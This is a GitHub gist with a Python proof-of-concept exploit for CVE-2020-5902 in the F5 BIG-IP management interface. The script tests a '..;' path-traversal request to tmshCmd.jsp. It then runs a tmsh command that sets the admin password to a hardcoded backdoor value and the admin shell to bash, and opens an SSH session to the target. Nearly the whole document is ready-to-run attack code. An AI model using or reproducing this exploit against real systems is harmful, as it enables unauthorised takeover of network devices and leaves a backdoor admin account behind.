Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user
#!/usr/bin/env python3 | |
import os | |
import requests | |
import urllib.parse | |
target='<ip of target>' | |
base_url=f'https://{target}/' | |
password='B@ckd00r!' | |
def check(base_url): | |
r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp', verify=False) | |
return r.status_code == 200 | |
def change_admin_password(base_url, password): | |
command=urllib.parse.quote(f'modify auth user admin password {password} shell bash') | |
r = requests.get(f'{base_url}tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}', verify=False) | |
print(r.text) | |
if check(base_url): | |
change_admin_password(base_url, password) | |
print(f'Login with password: {password}') | |
os.system(f'ssh admin@{target}') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment